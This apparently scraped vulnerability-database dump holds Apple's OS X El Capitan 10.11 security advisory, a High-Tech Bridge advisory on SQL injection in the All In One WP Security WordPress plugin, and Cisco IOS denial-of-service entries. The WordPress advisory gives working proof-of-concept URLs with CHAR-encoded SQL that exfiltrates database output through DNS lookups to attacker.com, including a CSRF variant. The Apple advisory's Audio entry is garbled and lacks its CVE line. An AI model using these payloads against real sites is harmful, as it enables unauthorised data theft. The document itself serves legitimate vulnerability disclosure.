Hash: SHA256
APPLE-SA-2015-09-30-3 OS X El Capitan 10.11
OS X El Capitan 10.11 is now available and addresses the following:
Address Book
Available for: Mac OS X v10.6.8 and later
Impact: A local attacker may be able to inject arbitrary code to
processes loading the Address Book framework
Description: An issue existed in Address Book framework's handling
of an environment variable. This issue was addressed through improved
environment variable handling.
CVE-ID
CVE-2015-5897 : Dan Bastone of Gotham Digital Science
AirScan
Available for: Mac OS X v10.6.8 and later
Impact: An attacker with a privileged network position may be able
to extract payload from eSCL packets sent over a secure connection
Description: An issue existed in the processing of eSCL packets.
This issue was addressed through improved validation checks.
CVE-ID
CVE-2015-5853 : an anonymous researcher
apache_mod_php
Available for: Mac OS X v10.6.8 and later
Impact: Multiple vulnerabilities in PHP
Description: Multiple vulnerabilities existed in PHP versions prior
to 5.5.27, including one which may have led to remote code execution.
This issue was addressed by updating PHP to version 5.5.27.
CVE-ID
CVE-2014-9425
CVE-2014-9427
CVE-2014-9652
CVE-2014-9705
CVE-2014-9709
CVE-2015-0231
CVE-2015-0232
CVE-2015-0235
CVE-2015-0273
CVE-2015-1351
CVE-2015-1352
CVE-2015-2301
CVE-2015-2305
CVE-2015-2331
CVE-2015-2348
CVE-2015-2783
CVE-2015-2787
CVE-2015-3329
CVE-2015-3330
Apple Online Store Kit
Available for: Mac OS X v10.6.8 and later
Impact: A malicious application may gain access to a user's keychain
items
Description: An issue existed in validation of access control lists
for iCloud keychain items. This issue was addressed through improved
access control list checks.
CVE-ID
CVE-2015-5836 : XiaoFeng Wang of Indiana University, Luyi Xing of
Indiana University, Tongxin Li of Peking University, Tongxin Li of
Peking University, Xiaolong Bai of Tsinghua University
AppleEvents
Available for: Mac OS X v10.6.8 and later
Impact: A user connected through screen sharing can send Apple
Events to a local user's session
Description: An issue existed with Apple Event filtering that
allowed some users to send events to other users. This was addressed
by improved Apple Event handling.
CVE-ID
CVE-2015-5849 : Jack Lawrence (@_jackhl)
Audio
Available for: Mac OS X v10.6.8 and later
Impact: Playing a malicious audio file may lead to an unexpected
application termination
Description: A memory corruption issue existed in the handling of
audio files. This issue issue was addressed through improved memory
handling. (Adv.:
Prof. Taekyoung Kwon), Yonsei University, Seoul, Korea
bash
Available for: Mac OS X v10.6.8 and later
Impact: Multiple vulnerabilities in bash
Description: Multiple vulnerabilities existed in bash versions prior
to 3.2 patch level 57. These issues were addressed by updating bash
version 3.2 to patch level 57.
CVE-ID
CVE-2014-6277
CVE-2014-7186
CVE-2014-7187
Certificate Trust Policy
Available for: Mac OS X v10.6.8 and later
Impact: Update to the certificate trust policy
Description: The certificate trust policy was updated. The complete
list of certificates may be viewed at https://support.apple.com/en-
us/HT202858.
CFNetwork Cookies
Available for: Mac OS X v10.6.8 and later
Impact: An attacker in a privileged network position can track a
user's activity
Description: A cross-domain cookie issue existed in the handling of
top level domains. The issue was address through improved
restrictions of cookie creation.
CVE-ID
CVE-2015-5885 : Xiaofeng Zheng of Blue Lotus Team, Tsinghua
University
CFNetwork FTPProtocol
Available for: Mac OS X v10.6.8 and later
Impact: Malicious FTP servers may be able to cause the client to
perform reconnaissance on other hosts
Description: An issue existed in the handling of FTP packets when
using the PASV command. This issue was resolved through improved
validation.
CVE-ID
CVE-2015-5912 : Amit Klein
CFNetwork HTTPProtocol
Available for: Mac OS X v10.6.8 and later
Impact: A maliciously crafted URL may be able to bypass HSTS and
leak sensitive data
Description: A URL parsing vulnerability existed in HSTS handling.
This issue was addressed through improved URL parsing.
CVE-ID
CVE-2015-5858 : Xiaofeng Zheng of Blue Lotus Team, Tsinghua
University
CFNetwork HTTPProtocol
Available for: Mac OS X v10.6.8 and later
Impact: A malicious website may be able to track users in Safari
private browsing mode
Description: An issue existed in the handling of HSTS state in
Safari private browsing mode. This issue was addressed through
improved state handling.
CVE-ID
CVE-2015-5860 : Sam Greenhalgh of RadicalResearch Ltd
CFNetwork Proxies
Available for: Mac OS X v10.6.8 and later
Impact: Connecting to a malicious web proxy may set malicious
cookies for a website
Description: An issue existed in the handling of proxy connect
responses. This issue was addressed by removing the set-cookie header
while parsing the connect response.
CVE-ID
CVE-2015-5841 : Xiaofeng Zheng of Blue Lotus Team, Tsinghua
University
CFNetwork SSL
Available for: Mac OS X v10.6.8 and later
Impact: An attacker with a privileged network position may intercept
SSL/TLS connections
Description: A certificate validation issue existed in NSURL when a
certificate changed. This issue was addressed through improved
certificate validation.
CVE-ID
CVE-2015-5824 : Timothy J. Wood of The Omni Group
CFNetwork SSL
Available for: Mac OS X v10.6.8 and later
Impact: An attacker may be able to decrypt data protected by SSL
Description: There are known attacks on the confidentiality of RC4.
An attacker could force the use of RC4, even if the server preferred
better ciphers, by blocking TLS 1.0 and higher connections until
CFNetwork tried SSL 3.0, which only allows RC4. This issue was
addressed by removing the fallback to SSL 3.0.
CoreCrypto
Available for: Mac OS X v10.6.8 and later
Impact: An attacker may be able to determine a private key
Description: By observing many signing or decryption attempts, an
attacker may have been able to determine the RSA private key. This
issue was addressed using improved encryption algorithms.
CoreText
Available for: Mac OS X v10.6.8 and later
Impact: Processing a maliciously crafted font file may lead to
arbitrary code execution
Description: A memory corruption issue existed in the processing of
font files. This issue was addressed through improved input
validation.
CVE-ID
CVE-2015-5874 : John Villamil (@day6reak), Yahoo Pentest Team
Dev Tools
Available for: Mac OS X v10.6.8 and later
Impact: A malicious application may be able to execute arbitrary
code with system privileges
Description: A memory corruption issue existed in dyld. This was
addressed through improved memory handling.
CVE-ID
CVE-2015-5876 : beist of grayhash
Dev Tools
Available for: Mac OS X v10.6.8 and later
Impact: An application may be able to bypass code signing
Description: An issue existed with validation of the code signature
of executables. This issue was addressed through improved bounds
checking.
CVE-ID
CVE-2015-5839 : @PanguTeam
Disk Images
Available for: Mac OS X v10.6.8 and later
Impact: A local user may be able to execute arbitrary code with
system privileges
Description: A memory corruption issue existed in DiskImages. This
issue was addressed through improved memory handling.
CVE-ID
CVE-2015-5847 : Filippo Bigarella, Luca Todesco
dyld
Available for: Mac OS X v10.6.8 and later
Impact: An application may be able to bypass code signing
Description: An issue existed with validation of the code signature
of executables. This issue was addressed through improved bounds
checking.
CVE-ID
CVE-2015-5839 : TaiG Jailbreak Team
EFI
Available for: Mac OS X v10.6.8 and later
Impact: A malicious application can prevent some systems from
booting
Description: An issue existed with the addresses covered by the
protected range register. This issue was fixed by changing the
protected range.
CVE-ID
CVE-2015-5900 : Xeno Kovah & Corey Kallenberg from LegbaCore
EFI
Available for: Mac OS X v10.6.8 and later
Impact: A malicious Apple Ethernet Thunderbolt adapter may be able
to affect firmware flashing
Description: Apple Ethernet Thunderbolt adapters could modify the
host firmware if connected during an EFI update. This issue was
addressed by not loading option ROMs during updates.
CVE-ID
CVE-2015-5914 : Trammell Hudson of Two Sigma Investments and snare
Finder
Available for: Mac OS X v10.6.8 and later
Impact: The "Secure Empty Trash" feature may not securely delete
files placed in the Trash
Description: An issue existed in guaranteeing secure deletion of
Trash files on some systems, such as those with flash storage. This
issue was addressed by removing the "Secure Empty Trash" option.
CVE-ID
CVE-2015-5901 : Apple
Game Center
Available for: Mac OS X v10.6.8 and later
Impact: A malicious Game Center application may be able to access a
player's email address
Description: An issue existed in Game Center in the handling of a
player's email. This issue was addressed through improved access
restrictions.
CVE-ID
CVE-2015-5855 : Nasser Alnasser
Heimdal
Available for: Mac OS X v10.6.8 and later
Impact: An attacker may be able to replay Kerberos credentials to
the SMB server
Description: An authentication issue existed in Kerberos
credentials. This issue was addressed through additional validation
of credentials using a list of recently seen credentials.
CVE-ID
CVE-2015-5913 : Tarun Chopra of Microsoft Corporation, U.S. and Yu
Fan of Microsoft Corporation, China
ICU
Available for: Mac OS X v10.6.8 and later
Impact: Multiple vulnerabilities in ICU
Description: Multiple vulnerabilities existed in ICU versions prior
to 53.1.0. These issues were addressed by updating ICU to version
55.1.
CVE-ID
CVE-2014-8146
CVE-2014-8147
CVE-2015-5922
Install Framework Legacy
Available for: Mac OS X v10.6.8 and later
Impact: A local user may be able to gain root privileges
Description: A restriction issue existed in the Install private
framework containing a privileged executable. This issue was
addressed by removing the executable.
CVE-ID
CVE-2015-5888 : Apple
Intel Graphics Driver
Available for: Mac OS X v10.6.8 and later
Impact: A local user may be able to execute arbitrary code with
system privileges
Description: Multiple memory corruption issues existed in the Intel
Graphics Driver. These issues were addressed through improved memory
handling.
CVE-ID
CVE-2015-5830 : Yuki MIZUNO (@mzyy94)
CVE-2015-5877 : Camillus Gerard Cai
IOAudioFamily
Available for: Mac OS X v10.6.8 and later
Impact: A local user may be able to determine kernel memory layout
Description: An issue existed in IOAudioFamily that led to the
disclosure of kernel memory content. This issue was addressed by
permuting kernel pointers.
CVE-ID
CVE-2015-5864 : Luca Todesco
IOGraphics
Available for: Mac OS X v10.6.8 and later
Impact: A local user may be able to execute arbitrary code with
kernel privileges
Description: Multiple memory corruption issues existed in the
kernel. These issues were addressed through improved memory handling.
CVE-ID
CVE-2015-5871 : Ilja van Sprundel of IOActive
CVE-2015-5872 : Ilja van Sprundel of IOActive
CVE-2015-5873 : Ilja van Sprundel of IOActive
CVE-2015-5890 : Ilja van Sprundel of IOActive
IOGraphics
Available for: Mac OS X v10.6.8 and later
Impact: A malicious application may be able to determine kernel
memory layout
Description: An issue existed in IOGraphics which could have led to
the disclosure of kernel memory layout. This issue was addressed
through improved memory management.
CVE-ID
CVE-2015-5865 : Luca Todesco
IOHIDFamily
Available for: Mac OS X v10.6.8 and later
Impact: A malicious application may be able to execute arbitrary
code with system privileges
Description: Multiple memory corruption issues existed in
IOHIDFamily. These issues were addressed through improved memory
handling.
CVE-ID
CVE-2015-5866 : Apple
CVE-2015-5867 : moony li of Trend Micro
IOStorageFamily
Available for: Mac OS X v10.6.8 and later
Impact: A local attacker may be able to read kernel memory
Description: A memory initialization issue existed in the kernel.
This issue was addressed through improved memory handling.
CVE-ID
CVE-2015-5863 : Ilja van Sprundel of IOActive
Kernel
Available for: Mac OS X v10.6.8 and later
Impact: A local user may be able to execute arbitrary code with
kernel privileges
Description: Multiple memory corruption issues existed in the
Kernel. These issues were addressed through improved memory handling.
CVE-ID
CVE-2015-5868 : Cererdlong of Alibaba Mobile Security Team
CVE-2015-5896 : Maxime Villard of m00nbsd
CVE-2015-5903 : CESG
Kernel
Available for: Mac OS X v10.6.8 and later
Impact: A local process can modify other processes without
entitlement checks
Description: An issue existed where root processes using the
processor_set_tasks API were allowed to retrieve the task ports of
other processes. This issue was addressed through additional
entitlement checks.
CVE-ID
CVE-2015-5882 : Pedro Vilaca, working from original research by
Ming-chieh Pan and Sung-ting Tsai; Jonathan Levin
Kernel
Available for: Mac OS X v10.6.8 and later
Impact: A local attacker may control the value of stack cookies
Description: Multiple weaknesses existed in the generation of user
space stack cookies. These issues were addressed through improved
generation of stack cookies.
CVE-ID
CVE-2013-3951 : Stefan Esser
Kernel
Available for: Mac OS X v10.6.8 and later
Impact: An attacker may be able to launch denial of service attacks
on targeted TCP connections without knowing the correct sequence
number
Description: An issue existed in xnu's validation of TCP packet
headers. This issue was addressed through improved TCP packet header
validation.
CVE-ID
CVE-2015-5879 : Jonathan Looney
Kernel
Available for: Mac OS X v10.6.8 and later
Impact: An attacker in a local LAN segment may disable IPv6 routing
Description: An insufficient validation issue existed in the
handling of IPv6 router advertisements that allowed an attacker to
set the hop limit to an arbitrary value. This issue was addressed by
enforcing a minimum hop limit.
CVE-ID
CVE-2015-5869 : Dennis Spindel Ljungmark
Kernel
Available for: Mac OS X v10.6.8 and later
Impact: A local user may be able to determine kernel memory layout
Description: An issue existed that led to the disclosure of kernel
memory layout. This was addressed through improved initialization of
kernel memory structures.
CVE-ID
CVE-2015-5842 : beist of grayhash
Kernel
Available for: Mac OS X v10.6.8 and later
Impact: A local user may be able to determine kernel memory layout
Description: An issue existed in debugging interfaces that led to
the disclosure of memory content. This issue was addressed by
sanitizing output from debugging interfaces.
CVE-ID
CVE-2015-5870 : Apple
Kernel
Available for: Mac OS X v10.6.8 and later
Impact: A local user may be able to cause a system denial of service
Description: A state management issue existed in debugging
functionality. This issue was addressed through improved validation.
CVE-ID
CVE-2015-5902 : Sergi Alvarez (pancake) of NowSecure Research Team
libc
Available for: Mac OS X v10.6.8 and later
Impact: A local user may be able to execute arbitrary code with
kernel privileges
Description: A memory corruption issue existed in the kernel. This
issue was addressed through improved memory handling.
CVE-ID
CVE-2014-8611 : Adrian Chadd and Alfred Perlstein of Norse
Corporation
libpthread
Available for: Mac OS X v10.6.8 and later
Impact: A local user may be able to execute arbitrary code with
kernel privileges
Description: A memory corruption issue existed in the kernel. This
issue was addressed through improved memory handling.
CVE-ID
CVE-2015-5899 : Lufeng Li of Qihoo 360 Vulcan Team
libxpc
Available for: Mac OS X v10.6.8 and later
Impact: Many SSH connections could cause a denial of service
Description: launchd had no limit on the number of processes that
could be started by a network connection. This issue was addressed by
limiting the number of SSH processes to 40.
CVE-ID
CVE-2015-5881 : Apple
Login Window
Available for: Mac OS X v10.6.8 and later
Impact: The screen lock may not engage after the specified time
period
Description: An issue existed with captured display locking. The
issue was addressed through improved lock handling.
CVE-ID
CVE-2015-5833 : Carlos Moreira, Rainer Dorau of rainer dorau
informationsdesign, Chris Nehren, Kai Takac, Hans Douma, Toni
Vaahtera, and an anonymous researcher
lukemftpd
Available for: Mac OS X v10.6.8 and later
Impact: A remote attacker may be able to deny service to the FTP
server
Description: A glob-processing issue existed in tnftpd. This issue
was addressed through improved glob validation.
CVE-ID
CVE-2015-5917 : Maksymilian Arciemowicz of cxsecurity.com
Mail
Available for: Mac OS X v10.6.8 and later
Impact: Printing an email may leak sensitive user information
Description: An issue existed in Mail which bypassed user
preferences when printing an email. This issue was addressed through
improved user preference enforcement.
CVE-ID
CVE-2015-5881 : Owen DeLong of Akamai Technologies, Noritaka Kamiya,
Dennis Klein from Eschenburg, Germany, Jeff Hammett of Systim
Technology Partners
Mail
Available for: Mac OS X v10.6.8 and later
Impact: An attacker in a privileged network position may be able to
intercept attachments of S/MIME-encrypted e-mail sent via Mail Drop
Description: An issue existed in handling encryption parameters for
large email attachments sent via Mail Drop. The issue is addressed by
no longer offering Mail Drop when sending an encrypted e-mail.
CVE-ID
CVE-2015-5884 : John McCombs of Integrated Mapping Ltd
Multipeer Connectivity
Available for: Mac OS X v10.6.8 and later
Impact: A local attacker may be able to observe unprotected
multipeer data
Description: An issue existed in convenience initializer handling in
which encryption could be actively downgraded to a non-encrypted
session. This issue was addressed by changing the convenience
initializer to require encryption.
CVE-ID
CVE-2015-5851 : Alban Diquet (@nabla_c0d3) of Data Theorem
NetworkExtension
Available for: Mac OS X v10.6.8 and later
Impact: A malicious application may be able to determine kernel
memory layout
Description: An uninitialized memory issue in the kernel led to the
disclosure of kernel memory content. This issue was addressed through
improved memory initialization.
CVE-ID
CVE-2015-5831 : Maxime Villard of m00nbsd
Notes
Available for: Mac OS X v10.6.8 and later
Impact: A local user may be able to leak sensitive user information
Description: An issue existed in parsing links in the Notes
application. This issue was addressed through improved input
validation.
CVE-ID
CVE-2015-5878 : Craig Young of Tripwire VERT, an anonymous researcher
Notes
Available for: Mac OS X v10.6.8 and later
Impact: A local user may be able to leak sensitive user information
Description: A cross-site scripting issue existed in parsing text by
the Notes application. This issue was addressed through improved
input validation.
CVE-ID
CVE-2015-5875 : xisigr of Tencent's Xuanwu LAB (www.tencent.com)
OpenSSH
Available for: Mac OS X v10.6.8 and later
Impact: Multiple vulnerabilities in OpenSSH
Description: Multiple vulnerabilities existed in OpenSSH versions
prior to 6.9. These issues were addressed by updating OpenSSH to
version 6.9.
CVE-ID
CVE-2014-2532
OpenSSL
Available for: Mac OS X v10.6.8 and later
Impact: Multiple vulnerabilities in OpenSSL
Description: Multiple vulnerabilities existed in OpenSSL versions
prior to 0.9.8zg. These were addressed by updating OpenSSL to version
0.9.8zg.
CVE-ID
CVE-2015-0286
CVE-2015-0287
procmail
Available for: Mac OS X v10.6.8 and later
Impact: Multiple vulnerabilities in procmail
Description: Multiple vulnerabilities existed in procmail versions
prior to 3.22. These issues were addressed by removing procmail.
CVE-ID
CVE-2014-3618
remote_cmds
Available for: Mac OS X v10.6.8 and later
Impact: A local user may be able to execute arbitrary code with root
privileges
Description: An issue existed in the usage of environment variables
by the rsh binary. This issue was addressed by dropping setuid
privileges from the rsh binary.
CVE-ID
CVE-2015-5889 : Philip Pettersson
removefile
Available for: Mac OS X v10.6.8 and later
Impact: Processing malicious data may lead to unexpected application
termination
Description: An overflow fault existed in the checkint division
routines. This issue was addressed with improved division routines.
CVE-ID
CVE-2015-5840 : an anonymous researcher
Ruby
Available for: Mac OS X v10.6.8 and later
Impact: Multiple vulnerabilities in Ruby
Description: Multiple vulnerabilities existed in Ruby versions prior
to 2.0.0p645. These were addressed by updating Ruby to version
2.0.0p645.
CVE-ID
CVE-2014-8080
CVE-2014-8090
CVE-2015-1855
Security
Available for: Mac OS X v10.6.8 and later
Impact: The lock state of the keychain may be incorrectly displayed
to the user
Description: A state management issue existed in the way keychain
lock status was tracked. This issue was addressed through improved
state management.
CVE-ID
CVE-2015-5915 : Peter Walz of University of Minnesota, David Ephron,
Eric E. Lawrence, Apple
Security
Available for: Mac OS X v10.6.8 and later
Impact: A trust evaluation configured to require revocation checking
may succeed even if revocation checking fails
Description: The kSecRevocationRequirePositiveResponse flag was
specified but not implemented. This issue was addressed by
implementing the flag.
CVE-ID
CVE-2015-5894 : Hannes Oud of kWallet GmbH
Security
Available for: Mac OS X v10.6.8 and later
Impact: A remote server may prompt for a certificate before
identifying itself
Description: Secure Transport accepted the CertificateRequest
message before the ServerKeyExchange message. This issue was
addressed by requiring the ServerKeyExchange first.
CVE-ID
CVE-2015-5887 : Benjamin Beurdouche, Karthikeyan Bhargavan, Antoine
Delignat-Lavaud, Alfredo Pironti, and Jean Karim Zinzindohoue of
INRIA Paris-Rocquencourt, and Cedric Fournet and Markulf Kohlweiss of
Microsoft Research, Pierre-Yves Strub of IMDEA Software Institute
SMB
Available for: Mac OS X v10.6.8 and later
Impact: A local user may be able to execute arbitrary code with
kernel privileges
Description: A memory corruption issue existed in the kernel. This
issue was addressed through improved memory handling.
CVE-ID
CVE-2015-5891 : Ilja van Sprundel of IOActive
SMB
Available for: Mac OS X v10.6.8 and later
Impact: A local user may be able to determine kernel memory layout
Description: An issue existed in SMBClient that led to the
disclosure of kernel memory content. This issue was addressed through
improved bounds checking.
CVE-ID
CVE-2015-5893 : Ilja van Sprundel of IOActive
SQLite
Available for: Mac OS X v10.6.8 and later
Impact: Multiple vulnerabilities in SQLite v3.8.5
Description: Multiple vulnerabilities existed in SQLite v3.8.5.
These issues were addressed by updating SQLite to version 3.8.10.2.
CVE-ID
CVE-2015-3414
CVE-2015-3415
CVE-2015-3416
Telephony
Available for: Mac OS X v10.6.8 and later
Impact: A local attacker can place phone calls without the user's
knowledge when using Continuity
Description: An issue existed in the authorization checks for
placing phone calls. This issue was addressed through improved
authorization checks.
CVE-ID
CVE-2015-3785 : Dan Bastone of Gotham Digital Science
Terminal
Available for: Mac OS X v10.6.8 and later
Impact: Maliciously crafted text could mislead the user in Terminal
Description: Terminal did not handle bidirectional override
characters in the same way when displaying text and when selecting
text. This issue was addressed by suppressing bidirectional override
characters in Terminal.
CVE-ID
CVE-2015-5883 : an anonymous researcher
tidy
Available for: Mac OS X v10.6.8 and later
Impact: Visiting a maliciously crafted website may lead to arbitrary
code execution
Description: Multiple memory corruption issues existed in tidy.
These issues were addressed through improved memory handling.
CVE-ID
CVE-2015-5522 : Fernando Munoz of NULLGroup.com
CVE-2015-5523 : Fernando Munoz of NULLGroup.com
Time Machine
Available for: Mac OS X v10.6.8 and later
Impact: A local attacker may gain access to keychain items
Description: An issue existed in backups by the Time Machine
framework. This issue was addressed through improved coverage of Time
Machine backups.
CVE-ID
CVE-2015-5854 : Jonas Magazinius of Assured AB
Note: OS X El Capitan 10.11 includes the security content of
Safari 9: https://support.apple.com/kb/HT205265.
OS X El Capitan 10.11 may be obtained from the Mac App Store:
http://www.apple.com/support/downloads/
Information will also be posted to the Apple Security Updates
web site: https://support.apple.com/kb/HT201222
This message is signed with Apple's Product Security PGP key,
and details are available at:
https://www.apple.com/support/security/pgp/
-----BEGIN PGP SIGNATURE-----
Comment: GPGTools - http://gpgtools.org
iQIcBAEBCAAGBQJWDB2wAAoJEBcWfLTuOo7t0sYP/2L3JOGPkHH8XUh2YHpu5qaw
S5F2v+SRpWleKQBVsGZ7oA8PV0rBTzEkzt8K1tNxYmxEqL9f/TpRiGoforn89thO
/hOtmVOfUcBjPZ4XKwMVzycfSMC9o6LxWTLEKDVylE+F+5jkXafOC9QaqD11dxX6
QhENkpS1BwrKhyaSVxEcgBQtZM9aTsVdZ78rTCb9XTn6gDnvs8NfIQquFOnaQT54
YJ36e5UcUsnyBIol+yGDbC3ZEhzSVIGE5/8/NFlFfRXLgnJArxD8lqz8WdfU9fop
hpT/dDqqAdYbRcW1ihcG1haiNHgP9yQCY5jRNfttb+Tc/kIi/QmPkEO0QS8Ygt/O
c3sUbNulr1LCinymFVwx16CM1DplGS/GmBL18BAEBnL6yi9tEhYDynZWLSEa37VR
8q802rXRSF10Wct9/kEeR4HgY/1k0KK/4Uddm3c0YyOU21ya7NAhoHGwmDa9g11r
N1TniOK8tPiCGjRNOJwuF6DKxD9L3Fv44bVlxAarGUGYkICqzaNS+bgKI1aQNahT
fJ91x5uKD4+L9v9c5slkoDIvWqIhO9oyuxgnmC5GstkwFplFXSOklLkTktjLGNn1
nJq8cPnZ/3E1RXTEwVhGljYw5pdZHNx98XmLomGrPqVlZfjGURK+5AXdf2pOlt2e
g6jld/w5tPuCFhGucE7Z
=XciV
-----END PGP SIGNATURE-----
| VAR-201410-1086 | CVE-2014-6242 | WordPress for All In One WP Security & Firewall In the plugin SQL Injection vulnerability |
CVSS V2: 6.5 CVSS V3: - Severity: MEDIUM |
Multiple SQL injection vulnerabilities in the All In One WP Security & Firewall plugin before 3.8.3 for WordPress allow remote authenticated users to execute arbitrary SQL commands via the (1) orderby or (2) order parameter in the aiowpsec page to wp-admin/admin.php. NOTE: this can be leveraged using CSRF to allow remote attackers to execute arbitrary SQL commands. Also, by abusing Cross-Site Request Forgery, a third party can SQL The command may be executed.
Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
All In One WP Security & Firewall 3.8.2 is vulnerable; other versions may also be affected. WordPress is a set of blogging platform developed by WordPress Software Foundation using PHP language, which supports setting up personal blogging websites on PHP and MySQL servers. Advisory ID: HTB23231
Product: All In One WP Security WordPress plugin
Vendor: Tips and Tricks HQ, Peter, Ruhul, Ivy
Vulnerable Version(s): 3.8.2 and probably prior
Tested Version: 3.8.2
Advisory Publication: September 3, 2014 [without technical details]
Vendor Notification: September 3, 2014
Vendor Patch: September 12, 2014
Public Disclosure: September 24, 2014
Vulnerability Type: SQL Injection [CWE-89]
CVE Reference: CVE-2014-6242
Risk Level: Medium
CVSSv2 Base Score: 6.5 (AV:N/AC:L/Au:S/C:P/I:P/A:P)
Solution Status: Fixed by Vendor
Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ )
-----------------------------------------------------------------------------------------------
Advisory Details:
High-Tech Bridge Security Research Lab discovered two SQL injection vulnerabilities in All In One WP Security WordPress plugin, which can be exploited to perform SQL Injection attacks. Both vulnerabilities require administrative privileges, however can be also exploited by non-authenticated attacker via CSRF vector. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.
The PoC code below is based on DNS Exfiltration technique and may be used to demonstrate vulnerability in the "orderby" parameter if the database of the vulnerable application is hosted on a Windows system. The PoC will send a DNS request demanding IP addess for `version()` (or any other sensetive output from the database) sub-domain of ".attacker.com" (a domain name, DNS server of which is controlled by the attacker):
http://[host]/wp-admin/admin.php?page=aiowpsec&tab=tab1&orderby=%28select%20load_file%28CONCAT%28CHAR%2892%29,CHAR%2892%29,%28select%20version%28%29%29,CHAR%2846%29,CHAR%2897%29,CHAR%28116%29,CHAR%28116%29,CHAR%2897%29,CHAR%2899%29,CHAR%28107%29,CHAR%28101%29,CHAR%28114%29,CHAR%2846%29,CHAR%2899%29,CHAR%28111%29,CHAR%28109%29,CHAR%2892%29,CHAR%28102%29,CHAR%28111%29,CHAR%28111%29,CHAR%2898%29,CHAR%2897%29,CHAR%28114%29%29%29%29
This vulnerability could also be exploited by a remote non-authenticated attacker via CSRF vector, since the application is prone to Cross-Site Request Forgery (CSRF) attacks. In order to do so an attacker should trick a logged-in administrator to visit a web page with an CSRF exploit, e.g.:
http://[host]/wp-admin/admin.php?page=aiowpsec&tab=tab1&order=,%28select%20load_file%28CONCAT%28CHAR%2892%29,CHAR%2892%29,%28select%20version%28%29%29,CHAR%2846%29,CHAR%2897%29,CHAR%28116%29,CHAR%28116%29,CHAR%2897%29,CHAR%2899%29,CHAR%28107%29,CHAR%28101%29,CHAR%28114%29,CHAR%2846%29,CHAR%2899%29,CHAR%28111%29,CHAR%28109%29,CHAR%2892%29,CHAR%28102%29,CHAR%28111%29,CHAR%28111%29,CHAR%2898%29,CHAR%2897%29,CHAR%28114%29%29%29%29
1.2 The vulnerability exists due to insufficient sanitization of user-supplied input passed via the "order" HTTP GET parameters to "/wp-admin/admin.php" script. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.
The PoC code below is based on DNS Exfiltration technique and may be used to demonstrate vulnerability in the "order" parameter if the database of the vulnerable application is hosted on a Windows system. The PoC will send a DNS request demanding IP addess for `version()` (or any other sensetive output from the database) sub-domain of ".attacker.com" (a domain name, DNS server of which is controlled by the attacker):
http://[host]/wp-admin/admin.php?page=aiowpsec&tab=tab1&orderby=%28select%20load_file%28CONCAT%28CHAR%2892%29,CHAR%2892%29,%28select%20version%28%29%29,CHAR%2846%29,CHAR%2897%29,CHAR%28116%29,CHAR%28116%29,CHAR%2897%29,CHAR%2899%29,CHAR%28107%29,CHAR%28101%29,CHAR%28114%29,CHAR%2846%29,CHAR%2899%29,CHAR%28111%29,CHAR%28109%29,CHAR%2892%29,CHAR%28102%29,CHAR%28111%29,CHAR%28111%29,CHAR%2898%29,CHAR%2897%29,CHAR%28114%29%29%29%29
This vulnerability could also be exploited by a remote non-authenticated attacker via CSRF vector, since the application is prone to Cross-Site Request Forgery (CSRF) attacks.
[2] All In One WP Security WordPress plugin - http://www.tipsandtricks-hq.com/wordpress-security-and-firewall-plugin - All round best WordPress security plugin.
[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures.
[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types.
[5] ImmuniWeb® SaaS - https://www.htbridge.com/immuniweb/ - hybrid of manual web application penetration test and cutting-edge vulnerability scanner available online via a Software-as-a-Service (SaaS) model.
-----------------------------------------------------------------------------------------------
Disclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References
| VAR-201409-0404 | CVE-2014-3354 |
Cisco IOS and IOS XE Service disruption in (DoS) Vulnerabilities
Related entries in the VARIoT exploits database: VAR-E-201204-0003, VAR-E-201204-0002, VAR-E-201204-0001 |
CVSS V2: 7.8 CVSS V3: - Severity: HIGH |
Cisco IOS 12.0, 12.2, 12.4, 15.0, 15.1, 15.2, and 15.3 and IOS XE 2.x and 3.x before 3.7.4S; 3.2.xSE and 3.3.xSE before 3.3.2SE; 3.3.xSG and 3.4.xSG before 3.4.4SG; and 3.8.xS, 3.9.xS, and 3.10.xS before 3.10.1S allow remote attackers to cause a denial of service (device reload) via malformed RSVP packets, aka Bug ID CSCui11547. Cisco IOS is the interconnected network operating system used on most Cisco system routers and network switches.
These issues are being tracked by Cisco Bug ID CSCui11547. The following products and versions are affected: Cisco IOS Release 12.0, Release 12.2, Release 12.4, Release 15.0, Release 15.1, Release 15.2, and Release 15.3, IOS XE 3.7.4S prior to 2.x and 3.x, prior to 3.3.2SE 3.2.xSE and 3.3.xSE, 3.3.xSG and 3.4.xSG before 3.4.4SG, 3.8.xS, 3.9.xS and 3.10.xS before 3.10.1S
| VAR-201409-0405 | CVE-2014-3355 | Cisco IOS and IOS XE Service disruption in the metadata flow function (DoS) Vulnerabilities |
CVSS V2: 7.8 CVSS V3: - Severity: HIGH |
The metadata flow feature in Cisco IOS 15.1 through 15.3 and IOS XE 3.3.xXO before 3.3.1XO, 3.6.xS and 3.7.xS before 3.7.6S, and 3.8.xS, 3.9.xS, and 3.10.xS before 3.10.1S allows remote attackers to cause a denial of service (device reload) via malformed RSVP packets, aka Bug ID CSCug75942. Cisco IOS is the interconnected network operating system used on most Cisco system routers and network switches.
This issue is being tracked by Cisco Bug ID CSCug75942. The following products and versions are affected: Cisco IOS Releases 15.1 through 15.3, IOS XE 3.3.xXO prior to 3.3.1XO, 3.6.xS and 3.7.xS prior to 3.7.6S, 3.8.xS and 3.9 prior to 3.10.1S .xS version, 3.10S version
| VAR-201409-0406 | CVE-2014-3356 | Cisco IOS and IOS XE Service disruption in the metadata flow function (DoS) Vulnerabilities |
CVSS V2: 7.8 CVSS V3: - Severity: HIGH |
The metadata flow feature in Cisco IOS 15.1 through 15.3 and IOS XE 3.3.xXO before 3.3.1XO, 3.6.xS and 3.7.xS before 3.7.6S, and 3.8.xS, 3.9.xS, and 3.10.xS before 3.10.1S allows remote attackers to cause a denial of service (device reload) via malformed RSVP packets, aka Bug ID CSCue22753. Cisco IOS is the interconnected network operating system used on most Cisco system routers and network switches.
